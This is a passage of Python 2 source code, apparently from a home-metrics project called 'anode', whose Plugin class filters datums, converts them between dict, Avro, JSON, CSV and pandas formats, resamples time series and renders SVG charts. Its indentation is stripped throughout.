datums_partitions.append(datums_history[datums_partition]["data_df"])
else:
datums_partition_lower = DATUM_TIMESTAMP_MIN if "start" not in datum_filter else \
(self.get_time_period(int(min(datum_filter["start"])), self.config["history_partition_seconds"]))
datums_partition_upper = DATUM_TIMESTAMP_MAX if "finish" not in datum_filter else \
(self.get_time_period(int(max(datum_filter["finish"])), self.config["history_partition_seconds"]))
for datums_partition in sorted(datums_history.keys()):
if datums_partition_upper >= datums_partition >= datums_partition_lower:
datums_partitions.append(datums_history[datums_partition]["data_df"])
if len(datums_partitions) > 0:
datums_partition_metadata = datums_history.itervalues().next().copy()
if len(datums_partitions) == 1:
datums_partition_metadata["data_df"] = datums_partitions[0].copy(deep=False)
else:
datums_partition_metadata["data_df"] = pandas.concat(datums_partitions, ignore_index=True)
datums_partition_metadata["data_df"] = Plugin.datums_df_resample(
Plugin.datums_df_filter(Plugin.datums_df_reindex(datums_partition_metadata["data_df"]), datum_filter), datum_filter)
datums.append(datums_partition_metadata)
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.datum_merge_history)
return datums
@staticmethod
def datum_encode(datum_dict):
datum_dict_encoded = datum_dict.copy()
for field in ("data_source", "data_metric", "data_temporal", "data_type", "data_unit", "bin_unit"):
datum_dict_encoded[field] = Plugin.datum_field_encode(datum_dict_encoded[field])
return datum_dict_encoded
@staticmethod
def datum_decode(datum_dict):
datum_dict_decoded = datum_dict.copy()
for field in ("data_source", "data_metric", "data_temporal", "data_type", "data_unit", "bin_unit"):
datum_dict_decoded[field] = Plugin.datum_field_decode(datum_dict_decoded[field])
return datum_dict_decoded
@staticmethod
def datum_encode_id(datum_dict):
datum_metric_tokens = datum_dict["data_metric"].split("__")
datum_name = datum_metric_tokens[2] if len(datum_metric_tokens) > 1 else datum_dict["data_metric"]
datum_domain = datum_metric_tokens[0] if len(datum_metric_tokens) > 1 else ""
datum_group = datum_metric_tokens[1] if len(datum_metric_tokens) > 1 else ""
datum_location = datum_metric_tokens[2].split("-")[0].title() if len(datum_metric_tokens) > 1 else ""
datum_location = (datum_location if datum_location in DATUM_LOCATIONS else DATUM_LOCATION_DEFAULT).lower()
return "__".join([
"anode",
datum_name,
datum_domain,
datum_group,
datum_location
])
@staticmethod
def datum_encode_guid(datum_dict):
return "_".join([
datum_dict["data_metric"],
datum_dict["data_type"],
datum_dict["data_unit"],
datum_dict["bin_unit"],
str(datum_dict["bin_width"])])
@staticmethod
def datum_decode_label(datum_dict_decoded):
datum_name = datum_dict_decoded["data_metric"].split(".")[2]
datum_domain = datum_dict_decoded["data_metric"].split(".")[0]
return (" ".join([
datum_name,
datum_domain
])).replace("-", " ").title()
@staticmethod
def datum_tostring(datum_dict):
datum_dict = Plugin.datum_decode(datum_dict)
return "{}.{}.{}.{}{}.{}={}{}{}".format(
datum_dict["data_source"], datum_dict["data_metric"], datum_dict["data_type"], datum_dict["bin_width"],
datum_dict["bin_timestamp"], datum_dict["bin_unit"], int(datum_dict["data_value"]) / Decimal(datum_dict["data_scale"]),
datum_dict["data_unit"], datum_dict["data_string"] if datum_dict["data_string"] is not None else ""
)
def datum_get(self, datum_scope, data_metric, data_type, data_unit, bin_width, bin_unit, data_derived_period=None,
data_derived_unit="day"):
if data_metric in self.datums and data_type in self.datums[data_metric] and data_unit in self.datums[data_metric][data_type] and \
(str(bin_width) + bin_unit) in self.datums[data_metric][data_type][data_unit] and \
datum_scope in self.datums[data_metric][data_type][data_unit][str(bin_width) + bin_unit]:
datum_dict = self.datums[data_metric][data_type][data_unit][str(bin_width) + bin_unit][datum_scope]
return datum_dict if (data_derived_period is None or datum_dict["bin_timestamp"] ==
self.get_time_period(self.get_time(), Plugin.get_seconds(data_derived_period,
data_derived_unit))) else None
return None
def datums_filter_get(self, datums_filtered, datum_filter):
log_timer = anode.Log(logging.DEBUG).start()
for datum_metric in self.datums:
if Plugin.is_filtered(datum_filter, "metrics", datum_metric):
for datum_type in self.datums[datum_metric]:
if Plugin.is_filtered(datum_filter, "types", datum_type):
for datum_unit in self.datums[datum_metric][datum_type]:
if Plugin.is_filtered(datum_filter, "units", datum_unit, exact_match=True):
for datum_bin in self.datums[datum_metric][datum_type][datum_unit]:
if Plugin.is_filtered(datum_filter, "bins", datum_bin):
datum_scopes = [DATUM_QUEUE_LAST] if "scope" not in datum_filter else datum_filter["scope"]
for datum_scope in datum_scopes:
if datum_scope in self.datums[datum_metric][datum_type][datum_unit][datum_bin]:
datums = []
if datum_scope == DATUM_QUEUE_LAST:
datums_format = "dict"
datums = [self.datums[datum_metric][datum_type][datum_unit][datum_bin][datum_scope]]
elif datum_scope == DATUM_QUEUE_HISTORY:
self.datum_merge_buffer_history(
self.datums[datum_metric][datum_type][datum_unit][datum_bin]
[DATUM_QUEUE_BUFFER],
self.datums[datum_metric][datum_type][datum_unit][datum_bin]
[DATUM_QUEUE_HISTORY])
datums_format = "df"
datums = self.datum_merge_history(
self.datums[datum_metric][datum_type][datum_unit][datum_bin][DATUM_QUEUE_HISTORY],
datum_filter)
elif datum_scope == DATUM_QUEUE_PUBLISH:
datums_format = "avro"
datums = self.datums[datum_metric][datum_type][datum_unit][datum_bin][datum_scope]
if datums_format not in datums_filtered:
datums_filtered[datums_format] = []
datums_filtered[datums_format].extend(datums)
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.datums_filter_get)
return datums_filtered
@staticmethod
def datums_filter(datums_filtered, datum_filter, datums):
log_timer = anode.Log(logging.DEBUG).start()
for datum in Plugin.datum_to_format(datums, "dict")["dict"]:
if Plugin.is_filtered(datum_filter, "metrics", datum["data_metric"]):
if Plugin.is_filtered(datum_filter, "types", datum["data_type"]):
if Plugin.is_filtered(datum_filter, "units", datum["data_unit"], exact_match=True):
if Plugin.is_filtered(datum_filter, "bins", str(datum["bin_width"]) + datum["bin_unit"]):
if "dict" not in datums_filtered:
datums_filtered["dict"] = []
datums_filtered["dict"].append(datum)
log_timer.log("Plugin", "timer", lambda: "[*]", context=Plugin.datums_filter)
return datums_filtered
@staticmethod
def is_filtered(datum_filter, datum_filter_field, datum_field, exact_match=False):
if datum_filter_field not in datum_filter:
return True
for datum_filter_field_value in datum_filter[datum_filter_field]:
datum_filter_field_value = Plugin.datum_field_encode(datum_filter_field_value)
if exact_match and datum_field == datum_filter_field_value or not exact_match and \
datum_field.find(datum_filter_field_value) != -1:
return True
return False
@staticmethod
def datums_sort(datums):
return sorted(datums, key=lambda datum: (
"aaaaa" if datum["data_unit"] == "_P24" else
"bbbbb" if datum["data_unit"] == "W" else
"ccccc" if datum["data_unit"] == "Wh" else
"ddddd" if datum["data_unit"] == "ms" else
"eeeee" if datum["data_unit"] == "MB_P2Fs" else
"eeeee" if datum["data_unit"] == "KB_P2Fs" else
"fffff" if datum["data_unit"] == "_P25" else
"zzzzz" + datum["data_unit"],
datum["data_metric"],
"aaaaa" if datum["data_type"] == "point" else
"bbbbb" if datum["data_type"] == "mean" else
"ccccc" if datum["data_type"] == "integral" else
"ddddd" if datum["data_type"] == "low" else
"eeeee" if datum["data_type"] == "high" else
datum["data_type"],
"aaaaa" if datum["bin_unit"] == "second" else
"bbbbb" if datum["bin_unit"] == "minute" else
"ccccc" if datum["bin_unit"] == "hour" else
"ddddd" if datum["bin_unit"] == "day_Dtime" else
"eeeee" if datum["bin_unit"] == "night_Dtime" else
"fffff" if datum["bin_unit"] == "day" else
"ggggg" if datum["bin_unit"] == "month" else
"hhhhh" if datum["bin_unit"] == "year" else
"iiiii",
datum["bin_width"]))
@staticmethod
def datum_dict_to_avro(datum_dict):
avro_writer = io.BytesIO()
avro.io.DatumWriter(DATUM_SCHEMA_AVRO).write(datum_dict, avro.io.BinaryEncoder(avro_writer))
return [avro_writer.getvalue()]
@staticmethod
def datum_dict_to_json(datum_dict):
datum_dict = Plugin.datum_decode(datum_dict)
return [json.dumps(datum_dict, separators=(',', ':'))]
@staticmethod
def datum_dict_to_csv(datum_dict):
datum_dict = datum_dict.copy()
if datum_dict["data_unit"] not in DATUM_SCHEMA_TO_ASCII:
DATUM_SCHEMA_TO_ASCII[datum_dict["data_unit"]] = urllib.quote_plus(datum_dict["data_unit"])
datum_dict["data_unit"] = DATUM_SCHEMA_TO_ASCII[datum_dict["data_unit"]]
if datum_dict["bin_unit"] not in DATUM_SCHEMA_TO_ASCII:
DATUM_SCHEMA_TO_ASCII[datum_dict["bin_unit"]] = urllib.quote_plus(datum_dict["bin_unit"])
datum_dict["bin_unit"] = DATUM_SCHEMA_TO_ASCII[datum_dict["bin_unit"]]
return [','.join(str(datum_dict[datum_field]) for datum_field in DATUM_SCHEMA_MODEL.iterkeys())]
@staticmethod
def datum_dict_to_df(datum_dict):
return Plugin.datums_dict_to_df([datum_dict])
@staticmethod
def datum_df_to_dict(datum_df):
datums_dict_df = Plugin.datums_df_unindex(datum_df["data_df"].copy(deep=False))
datums_dict = datums_dict_df.to_dict(orient="records")
for datum_dict in datums_dict:
datum_dict["data_value"] = numpy.asscalar(datum_dict["data_value"])
datum_dict["bin_timestamp"] = numpy.asscalar(datum_dict["bin_timestamp"])
datum_dict["data_timestamp"] = numpy.asscalar(datum_dict["data_timestamp"])
datum_dict.update(datum_df)
del datum_dict["data_df"]
return datums_dict
@staticmethod
def datum_avro_to_dict(datum_avro):
return [{datum_key.encode("utf-8"): (datum_value.encode("utf-8") if isinstance(datum_value, unicode) else datum_value)
for datum_key, datum_value in
avro.io.DatumReader(DATUM_SCHEMA_AVRO).read(avro.io.BinaryDecoder(io.BytesIO(datum_avro))).items()}]
# noinspection PyUnusedLocal
@staticmethod
def datum_to_format(datums, datum_format, off_thread=False):
log_timer = anode.Log(logging.DEBUG).start()
count = 0
count_sum = sum(len(datums_values) for datums_values in datums.values())
if "dict" in datums and len(datums["dict"]) > 0:
datums["dict"] = Plugin.datums_sort(datums["dict"])
log_timer.log("Plugin", "timer",
lambda: "[*] count and sort for [{}] dict datums".format(len(datums["dict"])) if "dict" in datums else 0,
context=Plugin.datum_to_format, off_thread=off_thread)
log_timer = anode.Log(logging.DEBUG).start()
datums_formatted = {datum_format: []}
datum_to_format_iterate = False
for datums_format, datums_value in datums.iteritems():
datums_format_function = None
if datums_format == "dict":
if datum_format == "avro":
datums_format_function = Plugin.datum_dict_to_avro
elif datum_format == "json":
datums_format_function = Plugin.datum_dict_to_json
elif datum_format == "csv":
datums_format_function = Plugin.datum_dict_to_csv
elif datum_format == "df":
datums_format_function = Plugin.datum_dict_to_df
elif datum_format != "dict":
raise ValueError("Unknown datum format conversion [{}] to [{}]".format(datums_format, datum_format))
elif datums_format == "df" and datum_format == "dict":
datums_format_function = Plugin.datum_df_to_dict
elif datums_format != datum_format:
datum_to_format_iterate = datum_format != "dict"
if datums_format == "avro":
datums_format_function = Plugin.datum_avro_to_dict
else:
raise ValueError("Unknown datum format conversion [{}] to [{}]".format(datums_format, datum_format))
if "dict" if datum_to_format_iterate else datum_format not in datums_formatted:
datums_formatted["dict" if datum_to_format_iterate else datum_format] = []
if datums_format_function is None:
datums_formatted["dict" if datum_to_format_iterate else datum_format].extend(datums_value)
count += len(datums_value)
else:
for datum in datums_value:
datums_formatted["dict" if datum_to_format_iterate else datum_format].extend(datums_format_function(datum))
count += 1
if count % SERIALISATION_BATCH == 0 or count == count_sum:
if off_thread and count < count_sum:
log_timer.pause()
time.sleep(SERIALISATION_BATCH_SLEEP)
log_timer.start()
log_timer.log("Plugin", "timer", lambda: "[*] {} to {} for [{}] datums".format(",".join(datums.keys()), datum_format, count),
context=Plugin.datum_to_format, off_thread=off_thread)
return datums_formatted if not datum_to_format_iterate else Plugin.datum_to_format(datums_formatted, datum_format, off_thread)
# noinspection PyArgumentList
@staticmethod
def datums_csv_to_dict(datums_csv):
datums_dict = {"dict": []}
for datum_dict in datums_csv:
datum_dict["data_value"] = long(datum_dict["data_value"])
datum_dict["data_unit"] = HTMLParser.HTMLParser().unescape(datum_dict["data_unit"])
if datum_dict["data_unit"] not in DATUM_SCHEMA_FROM_ASCII:
DATUM_SCHEMA_FROM_ASCII[datum_dict["data_unit"]] = \
urllib.unquote_plus(datum_dict["data_unit"].encode("utf-8")).decode("utf-8")
datum_dict["data_scale"] = float(datum_dict["data_scale"])
datum_dict["data_timestamp"] = long(datum_dict["data_timestamp"])
datum_dict["bin_timestamp"] = long(datum_dict["bin_timestamp"])
datum_dict["bin_width"] = int(datum_dict["bin_width"])
if datum_dict["bin_unit"] not in DATUM_SCHEMA_FROM_ASCII:
DATUM_SCHEMA_FROM_ASCII[datum_dict["bin_unit"]] = \
urllib.unquote_plus(datum_dict["bin_unit"].encode("utf-8")).decode("utf-8")
datums_dict["dict"].append(datum_dict)
return datums_dict
@staticmethod
def datums_dict_to_json(datums_dict, off_thread=False):
log_timer = anode.Log(logging.DEBUG).start()
count = 0
datums_json_fragments = []
for datum_dict in datums_dict:
datums_json_fragments.append(Plugin.datum_dict_to_json(datum_dict)[0])
count += 1
if count % SERIALISATION_BATCH == 0 or count == len(datums_dict):
datums_json_fragments = [",".join(datums_json_fragments)]
if off_thread and count < len(datums_dict):
log_timer.pause()
time.sleep(SERIALISATION_BATCH_SLEEP)
log_timer.start()
datums_json = "".join(["[", "" if len(datums_json_fragments) == 0 else datums_json_fragments[0], "]"])
log_timer.log("Plugin", "timer", lambda: "[*]", context=Plugin.datums_dict_to_json, off_thread=off_thread)
return datums_json
@staticmethod
def datums_dict_to_df(datums_dict, off_thread=False):
log_timer = anode.Log(logging.DEBUG).start()
datums_df = []
datums_data = {}
datums_metadata = {}
for datum_dict in datums_dict:
datum_id = "_".join([datum_dict["data_metric"], datum_dict["data_type"], str(datum_dict["bin_width"]) + datum_dict["bin_unit"]])
if datum_id not in datums_metadata:
datum_metadata = datum_dict.copy()
del datum_metadata["bin_timestamp"]
del datum_metadata["data_timestamp"]
del datum_metadata["data_value"]
datums_metadata[datum_id] = datum_metadata
datums_data[datum_id] = []
datums_data[datum_id].append({"bin_timestamp": datum_dict["bin_timestamp"], "data_timestamp": datum_dict["data_timestamp"],
"data_value": datum_dict["data_value"]})
for datum_id, datum_metadata in datums_metadata.iteritems():
datum_metadata["data_df"] = pandas.DataFrame(datums_data[datum_id])
datums_df.append(datum_metadata)
log_timer.log("Plugin", "timer", lambda: "[*]", context=Plugin.datums_dict_to_df, off_thread=off_thread)
return datums_df
@staticmethod
def datums_df_to_csv(datums_df, off_thread=False):
log_timer = anode.Log(logging.DEBUG).start()
datums_csv = datums_df.to_csv(index=False)
log_timer.log("Plugin", "timer", lambda: "[*]", context=Plugin.datums_df_to_csv, off_thread=off_thread)
return datums_csv
@staticmethod
def datums_df_to_svg(datums_df, off_thread=False):
log_timer = anode.Log(logging.DEBUG).start()
datums_plot_font_size = 14
datums_plot_alpha = 0.7
datums_plot_colour = "white"
datums_plot_colour_foreground = "0.5"
datums_plot_colour_background = "black"
datums_plot_colour_lines = \
["yellow", "lime", "red", "orange", "dodgerblue", "coral", "magenta", "aliceblue", "cyan", "darkgreen", "maroon"]
datums_plot_title = datums_df.title if hasattr(datums_df, "title") else None
datums_plot_buffer = StringIO()
datums_df = Plugin.datums_df_reindex(datums_df)
datums_points = len(datums_df.index)
datums_axes_x_range = ((datums_df.index[-1] - datums_df.index[0]).total_seconds()) if datums_points > 0 else 0
if datums_points == 0 or datums_axes_x_range == 0:
return SVG_EMPTY
datums_figure = Figure()
datums_axes = datums_figure.add_subplot(111)
datums_axes.set_prop_cycle(cycler("color", datums_plot_colour_lines))
for column in datums_df:
datums_axes.plot(datums_df.index, datums_df[column])
datums_axes.margins(0, 0, tight=True)
datums_axes.minorticks_off()
if datums_axes_x_range <= (10 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.SecondLocator(interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M:%S"))
elif datums_axes_x_range <= (60 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.SecondLocator(bysecond=[0, 10, 20, 30, 40, 50], interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M:%S"))
if datums_axes_x_range <= (60 * 2 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.MinuteLocator(interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
if datums_axes_x_range <= (60 * 10 + 2):
datums_axes.xaxis.set_major_locator(
matplotlib.dates.MinuteLocator(byminute=[0, 5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55], interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
elif datums_axes_x_range <= (60 * 60 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.MinuteLocator(byminute=[0, 10, 20, 30, 40, 50], interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
elif datums_axes_x_range <= (60 * 60 * 4 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.MinuteLocator(byminute=[0, 30], interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
elif datums_axes_x_range <= (60 * 60 * 8 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.HourLocator(interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
elif datums_axes_x_range <= (60 * 60 * 16 + 2):
datums_axes.xaxis.set_major_locator(
matplotlib.dates.HourLocator(byhour=[0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22], interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
elif datums_axes_x_range <= (60 * 60 * 24 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.HourLocator(byhour=[0, 4, 8, 12, 16, 20], interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
elif datums_axes_x_range <= (60 * 60 * 24 * 3 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.HourLocator(byhour=[0, 8, 16], interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
elif datums_axes_x_range <= (60 * 60 * 24 * 14 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.DayLocator(interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%a"))
else:
datums_axes.xaxis.set_major_locator(matplotlib.dates.DayLocator(interval=3))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%a"))
datums_axes.xaxis.label.set_visible(False)
datums_axes.xaxis.label.set_color(datums_plot_colour)
datums_axes.tick_params(axis="x", colors=datums_plot_colour)
datums_axes.yaxis.tick_right()
datums_axes.yaxis.label.set_color(datums_plot_colour)
datums_axes.yaxis.grid(b=True, which="major", color=datums_plot_colour_foreground, linestyle='--')
datums_axes.tick_params(axis="y", colors=datums_plot_colour)
datums_axes.spines["bottom"].set_color(datums_plot_colour)
datums_axes.spines["top"].set_color(datums_plot_colour)
datums_axes.spines["left"].set_color(datums_plot_colour)
datums_axes.spines["right"].set_color(datums_plot_colour)
datums_axes.patch.set_facecolor(datums_plot_colour_background)
if datums_plot_title is not None and (len(max(datums_df.columns.values, key=len)) + len(datums_plot_title)) > 40:
datums_plot_legend = datums_axes.legend(loc="lower left", ncol=1)
else:
datums_plot_legend = datums_axes.legend(loc="upper left", ncol=1)
if datums_plot_legend is not None:
for datums_plot_legend_text in datums_plot_legend.get_texts():
datums_plot_legend_text.set_fontsize(datums_plot_font_size)
datums_plot_legend_text.set_color(datums_plot_colour)
datums_plot_legend.get_frame().set_alpha(datums_plot_alpha)
datums_plot_legend.get_frame().set_edgecolor(datums_plot_colour_foreground)
datums_plot_legend.get_frame().set_facecolor(datums_plot_colour_background)
datums_figure.subplots_adjust(left=0, right=0.9, top=0.9725, bottom=0.08)
datums_canvas = FigureCanvas(datums_figure)
datums_canvas.draw()
if datums_plot_title is not None:
datums_axes.text(0.98, 0.975, datums_plot_title, horizontalalignment="right", verticalalignment="top",
transform=datums_axes.transAxes, color=datums_plot_colour, fontsize=datums_plot_font_size,
bbox=dict(facecolor=datums_plot_colour_background, edgecolor=datums_plot_colour_background,
alpha=datums_plot_alpha, boxstyle="round,pad=0.2"))
datums_axes_x_labels = [tick.get_text() for tick in datums_axes.get_xticklabels()]
if len(datums_axes_x_labels) > 1:
datums_axes_x_labels[0] = u""
datums_axes.set_xticklabels(datums_axes_x_labels)
datums_axes.set_ylim([datums_axes.get_ylim()[0] * 0.9, datums_axes.get_ylim()[1] * 1.15])
datums_figure.set_size_inches(6, 3.35)
datums_canvas.print_figure(datums_plot_buffer, facecolor=datums_plot_colour_background, format="svg")
datums_figure.clf()
plot.close()
del datums_canvas
del datums_figure
del datums_df
datums_plot_buffer.seek(0)
log_timer.log("Plugin", "timer", lambda: "[*]", context=Plugin.datums_df_to_svg, off_thread=off_thread)
return datums_plot_buffer.buf
@staticmethod
def datums_df_to_df(datums_df, datum_options=None, off_thread=False):
log_timer = anode.Log(logging.DEBUG).start()
datums_df_df = []
if len(datums_df) > 0:
log_timer_input = anode.Log(logging.DEBUG).start()
datums_df_groups = {}
for datums_df_dict in datums_df:
datums_df_dict_decoded = Plugin.datum_decode(datums_df_dict)
if datums_df_dict_decoded["data_unit"] not in DATUM_SCHEMA_TO_ASCII:
DATUM_SCHEMA_TO_ASCII[datums_df_dict_decoded["data_unit"]] = urllib.quote_plus(datums_df_dict_decoded["data_unit"])
if datums_df_dict["bin_unit"] not in DATUM_SCHEMA_TO_ASCII:
DATUM_SCHEMA_TO_ASCII[datums_df_dict_decoded["bin_unit"]] = urllib.quote_plus(datums_df_dict_decoded["bin_unit"])
datum_name = "&".join(
["metrics=" + datums_df_dict_decoded["data_metric"],
"types=" + datums_df_dict_decoded["data_type"],
"bins=" + str(datums_df_dict_decoded["bin_width"]) + DATUM_SCHEMA_TO_ASCII[datums_df_dict_decoded["bin_unit"]],
"unit=" + DATUM_SCHEMA_TO_ASCII[datums_df_dict_decoded["data_unit"]],
"scale=" + str(datums_df_dict_decoded["data_scale"]),
"temporal=" + datums_df_dict_decoded["data_temporal"],
"source=" + datums_df_dict_decoded["data_source"],
"anode_id=" + ID_BASE64
]
).decode("utf-8")
if datum_name not in datums_df_groups:
datums_df_groups[datum_name] = datums_df_dict.copy()
datums_df_groups[datum_name]["data_df"] = [datums_df_dict["data_df"]]
else:
datums_df_groups[datum_name]["data_df"].append(datums_df_dict["data_df"])
log_timer_input.log("Plugin", "timer", lambda: "[*] input [{}] dataframes and [{}] datums".format(
len(datums_df),
sum(len(datums_df_value["data_df"].index) for datums_df_value in datums_df)), context=Plugin.datums_df_to_df,
off_thread=off_thread)
log_timer_intermediate = anode.Log(logging.DEBUG).start()
datums_df_groups_concat = {}
datums_df_groups_concat_data = []
for datum_name, datums_df_dict in datums_df_groups.iteritems():
datums_df_dict_df = pandas.concat(datums_df_dict["data_df"])
datums_df_dict_df = Plugin.datums_df_reindex(datums_df_dict_df)
datums_df_dict_df["data_value"] = (datums_df_dict_df["data_value"] / datums_df_dict["data_scale"]).astype(
numpy.dtype(decimal.Decimal))
datums_df_dict_df.rename(
columns={"data_timestamp": "data_timestamp@" + datum_name, "data_value": "data_value_scaled@" + datum_name},
inplace=True)
datums_df_groups_concat_data.append("data_value_scaled@" + datum_name)
datums_df_groups_concat[datum_name] = datums_df_dict_df
datum_df = pandas.concat(datums_df_groups_concat.values(), axis=1, join="outer")
log_timer_intermediate.log("Plugin", "timer", lambda: "[*] intermediate [{}] dataframes and [{}] datums".format(
len(datums_df_groups_concat),
sum(len(datums_df_groups_concat_df.index) for datums_df_groups_concat_df in datums_df_groups_concat.values())),
context=Plugin.datums_df_to_df, off_thread=off_thread)
log_timer_output = anode.Log(logging.DEBUG).start()
datum_df = Plugin.datums_df_unindex(
Plugin.datums_df_fill(
Plugin.datums_df_resample(datum_df, datum_options), datums_df_groups_concat_data, datum_options))
if "print" in datum_options and datum_options["print"][0] == "pretty":
datum_df = Plugin.datums_df_metadata_pretty(Plugin.datums_df_data_pretty(datum_df))
datums_df_df.append(datum_df)
log_timer_output.log("Plugin", "timer", lambda: "[*] output [{}] dataframes and [{}] datums".format(
len(datums_df_df),
sum(response_df[response_df_column].count() for response_df in datums_df_df for response_df_column in response_df if
response_df_column.startswith("data_value"))),
context=Plugin.datums_df_to_df, off_thread=off_thread)
log_timer.log("Plugin", "timer", lambda: "[*]", context=Plugin.datums_df_to_df, off_thread=off_thread)
return datums_df_df
@staticmethod
def datums_to_format(datums, datum_format, datum_options, off_thread=False):
log_timer = anode.Log(logging.DEBUG).start()
datums_count = 0
for datums_format, datums_value in datums.iteritems():
if datums_format == "df":
datums_count += sum(len(datums_value_df["data_df"].index) for datums_value_df in datums_value)
else:
datums_count += len(datums_value)
if datum_format == "json" or datum_format == "dict":
datums_formatted = Plugin.datum_to_format(datums, "dict", off_thread)["dict"]
if datum_format == "json":
datums_formatted = Plugin.datums_dict_to_json(datums_formatted, off_thread)
elif datum_format == "csv" or datum_format == "svg" or datum_format == "df":
datums_formatted = Plugin.datums_df_to_df(Plugin.datum_to_format(datums, "df", off_thread)["df"], datum_options,
off_thread=off_thread)
if datum_format == "csv":
datums_formatted = Plugin.datums_df_to_csv(datums_formatted[0], off_thread) if len(datums_formatted) > 0 else ""
elif datum_format == "svg":
datums_formatted = Plugin.datums_df_to_svg(datums_formatted[0], off_thread) if len(datums_formatted) > 0 else SVG_EMPTY
else:
raise ValueError("Unknown datum format [{}]".format(datum_format))
log_timer.log("Plugin", "timer", lambda: "[*] {} to {} for [{}] datums".format(",".join(datums.keys()), datum_format, datums_count),
context=Plugin.datums_to_format, off_thread=off_thread)
return datums_formatted
@staticmethod
def datums_df_title(datum_df, datum_df_title=None):
if datum_df_title is not None:
datum_df.title = datum_df_title
return datum_df_title if datum_df_title is not None else (datum_df.title if hasattr(datum_df, "title") else None)
@staticmethod
def datums_df_reindex(datum_df):
datum_df_title = Plugin.datums_df_title(datum_df)
if "Time" in datum_df:
datum_df["bin_timestamp"] = pandas.to_datetime(datum_df["Time"])
datum_df["bin_timestamp"] = (datum_df['bin_timestamp'] - datetime.datetime(1970, 1, 1)).dt.total_seconds()
del datum_df["Time"]
if "bin_timestamp" in datum_df:
datum_df = datum_df[~datum_df["bin_timestamp"].duplicated(keep="first")]
datum_df.set_index("bin_timestamp", inplace=True)
datum_df.index = pandas.to_datetime(datum_df.index, unit="s")
Plugin.datums_df_title(datum_df, datum_df_title)
return datum_df
@staticmethod
def datums_df_unindex(datum_df):
datum_df_title = Plugin.datums_df_title(datum_df)
if "bin_timestamp" not in datum_df:
datum_df.index = datum_df.index.astype(numpy.int64) // 10 ** 9
datum_df.index.name = "bin_timestamp"
datum_df.reset_index(inplace=True)
datum_df.reindex_axis(sorted(datum_df.columns), axis=1)
Plugin.datums_df_title(datum_df, datum_df_title)
return datum_df
@staticmethod
def datums_df_filter(datum_df, datum_options):
datum_df_title = Plugin.datums_df_title(datum_df)
if datum_options is not None:
datum_df = Plugin.datums_df_reindex(datum_df)
if "start" in datum_options:
datum_df = datum_df[datum_df.index >= pandas.to_datetime(datum_options["start"], unit="s")[0]]
if "finish" in datum_options:
datum_df = datum_df[datum_df.index <= pandas.to_datetime(datum_options["finish"], unit="s")[0]]
Plugin.datums_df_title(datum_df, datum_df_title)
return datum_df
@staticmethod
def datums_df_resample(datum_df, datum_options):
datum_df_title = Plugin.datums_df_title(datum_df)
if datum_options is not None:
if "period" in datum_options:
datum_df = getattr(datum_df.resample(str(datum_options["period"][0]) + "S"),
"max" if "method" not in datum_options else datum_options["method"][0])()
Plugin.datums_df_title(datum_df, datum_df_title)
return datum_df
@staticmethod
def datums_df_fill(datum_df, datum_df_columns, datum_options):
datum_df_title = Plugin.datums_df_title(datum_df)
if datum_options is not None:
if "fill" in datum_options:
if datum_options["fill"][0] == "linear":
try:
datum_df[datum_df_columns] = datum_df[datum_df_columns].interpolate(method="time")
except TypeError as type_error:
anode.Log(logging.WARN).log("Plugin", "state",
lambda: "[plugin] could not interpolate data frame column [{}]".format(
type_error))
if datum_options["fill"][0] == "linear" or datum_options["fill"][0] == "forwardback":
datum_df[datum_df_columns] = datum_df[datum_df_columns].fillna(method="ffill").fillna(method="bfill")
if datum_options["fill"][0] == "linear" or datum_options["fill"][0] == "zeros":
datum_df[datum_df_columns] = datum_df[datum_df_columns].fillna(0)
Plugin.datums_df_title(datum_df, datum_df_title)
return datum_df
@staticmethod
def datums_df_data_pretty(datum_df):
datum_df_title = Plugin.datums_df_title(datum_df)
timestamps = []
if "Time" in datum_df:
timestamps.append("Time")
if "bin_timestamp" in datum_df:
timestamps.append("bin_timestamp")
for timestamp in timestamps:
datum_df[timestamp] = datum_df[timestamp].apply(
lambda epoch: datetime.datetime.fromtimestamp(epoch).strftime("%Y-%m-%d %H:%M:%S"))
Plugin.datums_df_title(datum_df, datum_df_title)
return datum_df
@staticmethod
def datums_df_metadata_pretty(datum_df):
datum_df_columns_deletes = []
datum_df_columns_renames = {}
datum_df_columns_renames_order = {}
datum_df_columns_renames_tokens = {}
datum_df_columns_renames_tokens_unit = set()
datum_df_columns_renames_tokens_metric0 = set()
datum_df_columns_renames_tokens_metric2 = set()
datum_df_columns_renames_tokens_metric2_type = set()
datum_df_columns_renames_tokens_metric3_type = set()
for datum_df_column in datum_df.columns:
if datum_df_column == "bin_timestamp":
datum_df_columns_renames[datum_df_column] = "Time"
datum_df_columns_renames_order[datum_df_column] = "0"
elif datum_df_column.startswith("data_value"):
datum_df_column_tokens_all = datum_df_column.split("data_value_scaled@")[1].split("&")
datum_df_column_tokens_metric = datum_df_column_tokens_all[0].split("=")[1]
